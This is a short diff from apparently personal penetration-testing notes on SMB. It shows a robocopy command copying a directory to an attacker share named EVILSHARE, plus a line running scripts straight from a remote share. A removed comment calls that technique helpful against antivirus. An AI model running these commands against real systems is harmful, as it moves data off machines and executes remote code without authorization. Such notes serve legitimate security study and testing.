secoats/oats_notes/network_recon/smb.md

 cmd> robocopy C:\directory_you_want_to_copy \\192.xxx.xxx.xxx\EVILSHARE\directory_you_want_to_copy /E
 ```

 You can also execute binaries and scripts straight from a remote share.
-Can help with AV issues.
+Useful if you cannot find a writable directory.
 ```bash
 ### execute from SMB share
 \\<remote_ip>\<remote_smb_share>\somefile.bat